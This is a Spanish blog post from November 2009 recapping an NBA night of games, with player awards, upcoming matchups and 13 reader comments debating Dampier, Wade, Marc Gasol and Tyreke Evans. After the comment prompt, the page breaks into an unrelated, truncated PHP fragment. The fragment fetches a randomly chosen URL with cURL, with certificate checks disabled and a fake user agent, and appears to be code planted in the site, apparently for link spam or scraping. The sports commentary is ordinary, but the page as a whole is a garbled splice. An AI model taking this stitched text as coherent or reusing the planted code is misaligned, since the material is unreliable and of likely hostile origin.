La Crónica (10/11/2009)

11 de November de 2009 por TheDeerHunter

Jornada entretenida, aunque sin grandes emociones ni juego deslumbrante.

De los máximos favoritos sólo los Magic entraban en escena en Charlotte, en uno de esos partidos feos que le encantan a Brown. Nuevamente la defensa de los locales estuvo muy correcta, controlando a Howard bastante bien y elimnando parte de la amenaza de los tiradores visitantes. El problema nuevamente estuvo en el ataque, donde no supieron sacar partido a los tiros abiertos (sólo un 2 de 17 en triples) y donde tienen que tirar de Nazr Mohammed como uno de los recursos ofensivos más eficaces del equipo. Los Magic ya han recuperado a Vince aunque anoche le tocó salir desde el banquillo.

En los Wizards, como también es habitual en ellos, vuelve a instalarse el virus del infortunio. A Jamison y Mike Miller se unía anoche Randy Foye como baja. Además a Wade le dió por hacer uno de esos partidos de cuarenta y pico y a Arenas le dió por perder todos los balones del mundo (12 él solito). En barrena.

Tampoco tuvieron excesiva suerte los Bulls ante los Nuggets, anotando la canasta de la victoria pero una milésima de segundo después que sonara la bocina. Buen partido de los titulares de ambos equipos. Volvió JR Smith pero no marcó diferencias desde el banquillo.

Extraordinario partido de Marc ante Oden. Lástima que del resto de la banda no se pueda decir lo mismo. Los Blazers no necesitaron ni sudar en su victoria en Memphis y da la impresión que el nuevo invento de McMillan funciona de maravilla. Le quedan 4 partidos de gira para confirmarlo. No sería demasiado raro que alcancen las 8 victorias seguidas al final de ella.

Por su parte los Rockets mostraron sus carencias anoche en Dallas. Dampier se hizo unas hamburguesas con Hayes, Scola, Landry y Andersen, cogiendo él sólo más rebotes que todos ellos juntos. Éste va a ser un problema endémico de los de Adelman pero hasta anoche lo habían logrado disimular bastante bien. Los Mavs hicieron un partido muy redondo. Poco que reprochar a los de rojo.

Por último, grandes noticias por el inesperado resurgir de Sacramento, aunque no tanto por la condena definitiva de Sergio al ostracismo. Duelo impresionante entre los dos frontcourts, Nocioni-Thompson-Hawes Vs Durant-Green-Krstic, pero fueron Tyreke y Udrih quienes desequilibraron la balanza contra Westbrook y Sefolosha.

PREMIOS

MVP: Soy incapaz de decidir que actuación es más espectacular: Si los 14 puntos sin fallo, 20 rebotes y 3 tapones de Erick Dampier o los 41 puntos, 5 rebotes y 5 asistencias de Dwyane Wade. Se abre el debate.

Rookie: Un partido más de Taj Gibson como titular y una nueva buena actuación pero el premio se va clarísima mente para Tyreke Evans que en su posición natural de escolta muestra su mejor cara y es capaz de realizar actuación tan redondas como la de ayer: 20 puntos, 8 rebotes y 8 asistencias. Veremos que pasa cuando vuelva Kevin Martin.

Sorpresa: Buen partido de Carlos Arroyo saliendo desde el banco de los Heat. 10 puntos, 4 rebotes y 2 asistencias en 15 minutos de juego demostrando que tiene sitio en esta liga.

Decepción: Como quien no quiere la cosa Gilbert Arenas ha entrado en la lista de los récords de la liga y es que su cifra de 12 pérdidas le coloca en el tercer puesto (empatado con varios jugadores) en la clasificación de mayor número de pérdidad en un partido. El récord son 14 y es de… Jason Kidd.

Esfuerzo en vano: 12 puntos, 21 rebotes y la una de las mayores decepciones tras ver como los árbitros anulaban la última canasta de su equipo. Mal día para levantarse de la cama. Hablamos de Joakim Noah.

RAZONES PARA TRASNOCHAR

Trece partidos, trece, se juegan la próxima madrugada, y entre todos ellos destacamos cuatro: la visita de los Jazz a Boston (1h30), la reedición de las últimas Finales del Este, Cavs vs Magic (2h00), el duelo en Ok Corral entre Mavs y Spurs (2h30) y, para cerrar la jornada, CP3 y sus Hornets contra Nash y sus Suns (4h30). Vale la pena mencionar también que jugarán los cuatro peores equipos de lo que llevamos de campaña: Knicks, Grizzlies, Wolves (los tres con 1-7) y los todavía a cero Nets.

Comenta

13 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    El invento de McMillan no funciona tan bien, a Roy se le ve mucho mas incómodo defendido por Gay que por Mayo, o lo que es lo mismo, por aleros que por escoltas. Las mayores diferencias las marcaron con el quinteto Miller-Roy-Rudy-LaMarcus-Oden en pista.

    Los Blazers tienen todo tipo de jugadores y Nate no los utiliza nada bien, el rato que Miller mandó en el partido, todos los Blazers funcionaron de maravilla.

    Y que no se me olvide decir que Travis Outlaw juega tan mal o peor que Rudy Gay, menudo desastre de tio.

      Citar

  2. HeiNeKeN dice:
    #2

    En mi opinion el MVP de la jornada para Dampier, porque hacia varias temporadas que no se marcaba un partido asi… y dudo que vuelva a repetirlo xD

    Me esta gustando mucho el incio de temporada que esta haciando Thompson…

      Citar

  3. sergio dice:
    #3

    Creo que el MVP se lo merece Dampier. No sabia que podia volver a hacer 20 rebotes en un partido. Me acuerdo del año en los Warriors que lo hacia al menos una vez al mes. Y tambien de como se ha reido de el en Playoffs cualquier pivot con cierto nombre.

    Lo de Arenas y sus 12 perdidas es otro record de este año junto a lo de Nowitzki en el ultimo cuarto y a Fisher. Resulta curioso ver como Kidd ha hecho el record de 14 perdidas (hizo un triple doble… y un cuadruple con perdidas jaja) y dos veces 12 perdidas en dos meses. Y Chris Mullin en 2º puesto con 13… alguien que tampoco sobresalia por perder muchos balones…. ni por tener demasiado el balon.

    Me esta encantando ver a Marc jugar asi. Yo ya he empezado a votarlo para el All-Star. No tiene mucha competencia y si algun español, aparte de Pau, tiene posibilidades, ese es Marc.

    McMillan sigue con lo suyo y le esta saliendo bien, pero a mi me escuece ver las cosas que inventa. Un 4-3 habiendo jugado con Minessota y Memphis no me parece un gran balance.

    Ayer hizo mejor partido Gortat que Howard. Howard recibio 4 tapones y Gortat los puso. Espero que no fueran a Dwight… Creo que en el proximo partido se cumple la sancion de Lewis no?. Me gustan los entrenadores tipo Brown o Adelman, sacando petroleo de lo que tienen y dando buenas sensaciones. No me gustan por su juego vistoso claro…

    Bonito partido el de OKC y SAC. Pude verlo durante un buen rato. Una pena el mal endemico en el tiro de Westbrook. Esa puede ser la diferencia para el entre un jugador de equipo y alguien importante.

    Una “putadinha” lo de Sergio, pero peor fue lo de Thabeet (para una vez que se corta las greñas….) o lo del señorito Brad Miller. Quizas no se vuelva a repetir. Y Deng se confirma como un gran defensor contra LeBron y Carmelo.

      Citar

  4. sergio dice:
    #4

    Por cierto… a J.R.Smith a partir de ahora hay que llamarlo Earl Smith III…. ¬¬

      Citar

  5. Danicarba dice:
    #5

    Hola a todos.
    Ayer me quede trasnochando pra ver el memphis portland y ls verdad es q como partido fue bastante aburrido y malo. Bien Marc, se está convirtirendo en un gran pivot. Dominó en la primera parte, pero recibió un par de correctivos de Greg Oden al comienzo de la segunda. Así a todo, muy consistente, y más en un equipo tan desastroso como Memphis. Ah, y recibe más balones de los que se dice por ahi, el equipo a ratos juega con Marc y parece q se entiende con Zach Randolph, del q creo q no es tan mal tipo. El tiempo dirça si esta última afirmación es un locura, pero de momento y comarado con Iverson…
    En cuanto a Rudy, pues poco hay q decir, acata las ordenes de equipo sin rechistar. Ayer tubo posición cómoda de tiro unas 10 veces. Se la pasaron dos e in extremis. Los de banquillo salen a lo suyo, Outlaw a q su familia flipe (estaba en el campo, menuda pandilla de obesas), Webster a machacar, Bayless a no se qué… En fin, da pena ver a un chaval como Rudy, con talento y sobretodo cabeza ninguneado de tal manera. Lo de ayer lamentable, en serio. Le van a faltar minutos, le va a sobrar calidad. Año complicado para él.
    Saludos

      Citar

  6. kantonyo dice:
    #6

    Es injusto decir que Marc tuvo un gran encuentro ante Oden. Creo que Oden hizo ayer uno de los partidos mas correcto que le he visto, incluso dando algún que otro pase con cierta clase, con algún movimiento de pies digno de top 10 semanal. Además no siempre estuvieron uno contra el otro y la mayoria de los puntos de Gasol no fueron ante su presencia.

    Coincidiendo con VivaDirk, Travis Outlaw está empezando la temporada bastante precipitado, tirandose todo lo que pasa por sus manos, aunque este debajo de su canasta. Tiene unas cualidades físicas impresionantes, un buen tiro de media-larga distancia, pero es un jugador que resta en vez de aportar. Es curioso que un entrenador como McMillan no se haya cansado ya de el, con lo metódico que es…. yo si que me he cansado, tu que opinas Oscar????

    El rendimiento de Tyreke Evans es espectacular, es una pena que coincida en el puesto de escolta con Martin. Yo creo que lo haría mejor como falso alero, que como base… me encanta este chico desde que le vi por primera vez el año pasado en un partido de Memphis Tigers. El quinteto de los Kings: Udrih-Martin-Evans-Thompson-Hawes es más atractivo de lo que pensabamos al principio …

      Citar

  7. Txusma dice:
    #7

    Pues viendo el historial de lesiones de Martin pq no buscar un traspaso y traerse a un buen base o un buen alero? Casi mejor base pq creo que García en forma es un jugador que aporta muchísimo.

      Citar

  8. kantonyo dice:
    #8

    Pues Kevin Martin vendría de lujo como segunda espada para algunos equipos, yo no lo veo como jugador franquicia, pero imaginaros a Kevin en Denver, Utah, Chicago, Cleveland, Toronto …. darían un salto de calidad tremendo.

      Citar

  9. Viva_Dirk dice:
    #9

    Pero tendrian que soltar algo por el, asi que no creo que fuese tan grande el salto, salvo que Toronto soltase a alguien tipo DeRozan+algun contrato alto.

      Citar

  10. TheDeerHunter dice:
    #10

    A lo de JR Smith… por lo visto todo ha quedado en una coña y el jugador se ha echado para atrás. Por lo visto le puteaban de lo lindo con lo de “Me llamo Earl”

      Citar

  11. sergio dice:
    #11

    “Me llamo Earl”? Y no habria alguna viejita que le llamara J.R. de la serie Dallas?

    Lo de Earl Smith III parece de titulo nobiliario, pero lo J.R.Smith parece sacado de CSI

      Citar

  12. sergio dice:
    #12

    Parece que son grandes tiempos de bases y no demasiado buenos de pivots (Marc, Brooks o Kevin Love aparte, el resto para defender [te echo de menos Hakeem]). Que Dampier te haga los numeros del otro dia es para mirarselo. Que Mohammed sea el maximo anotador de su equipo, tambien. Parece que ahora estan de moda los falsos “centers” dedicados a tirar desde lejos tipo Matt Bonner, Okur, Bargnani o Frye. Aunque tener al lado a bestias del calibre de Bosh, Amare, Duncan y Boozer ayude un tanto….

    Tengo ganas de ver el Suns-Lakers de esta noche. Los Suns son el primer equipo que mete 100 triples en menos de 10 partidos y encima con un 47.4%. El otro dia hablabais de Deron y Boozer parecidos a Malone y Stockton pero echadle un ojo a los Pick & Roll de Amare y Nash. Fisher siempre los ha defendido bien, espero que no se le olvide hoy. Jum…Bryant se ira por encima de los 40 con seguridad.

    Lanzo una pregunta ahora que es un tanto ventajista jaja ¿Puede llevarse Nash el MVP de la Regular? Si asi fuera igualaria al gran Magic, por cierto.

      Citar

  13. TheDeerHunter dice:
    #13

    Puestos a elucubrar a estas alturas de la temporada, se lo darían a Kobe, que subiría algún puesto en nuestro top50 por cierto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>